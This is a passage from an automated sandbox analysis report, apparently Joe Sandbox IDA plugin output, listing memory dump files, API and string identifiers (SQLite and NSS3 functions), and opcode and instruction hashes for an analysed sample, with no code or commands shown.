                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memcpysqlite3_value_textstrlen
                                                                                                                                                                                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                            • API String ID: 2453365862-264706735
                                                                                                                                                                                                                            • Opcode ID: aff1a00f06e244f964e810c5f011dd99c3f5f1f7e2b13ed9f860c42dadd7b907
                                                                                                                                                                                                                            • Instruction ID: 2a325a3f309adddf48dc9768dd440a48b7860a68987bbaced18723ee3b9de9ac
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aff1a00f06e244f964e810c5f011dd99c3f5f1f7e2b13ed9f860c42dadd7b907
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56812DB0E043914BDB00CF25C0903AEB7F2EF45318F588659D8A59BB85D736E857C791
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBB4D57
                                                                                                                                                                                                                            • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CBB4DE6
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorR_snprintf
                                                                                                                                                                                                                            • String ID: %d.%d
                                                                                                                                                                                                                            • API String ID: 2298970422-3954714993
                                                                                                                                                                                                                            • Opcode ID: c5e15cb99325d79c0a8a29633c930044ade431ef3a75b2feba247163be736cab
                                                                                                                                                                                                                            • Instruction ID: 55bbad51024cad66830ff9329117f72949a32bdb50a6e24469b9d18044a7d44f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5e15cb99325d79c0a8a29633c930044ade431ef3a75b2feba247163be736cab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C931DEB2D042696BEB109B659C05BFF7778EF41308F050469ED1567781EF709D05CBA2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$calloc
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3339632435-0
                                                                                                                                                                                                                            • Opcode ID: 85a80a9fb3d7511a88f7035b2a14c54e81ce0a416ba0b9dd2dca32b7efe9b183
                                                                                                                                                                                                                            • Instruction ID: aeface81ef8f096e5a3cc474d8222d7d6d274d851ae04183de601309de5063be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85a80a9fb3d7511a88f7035b2a14c54e81ce0a416ba0b9dd2dca32b7efe9b183
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11319EB0F843D68FDB00AF7CE5842697BB4FF06308F114669D89887A11EB349095CB83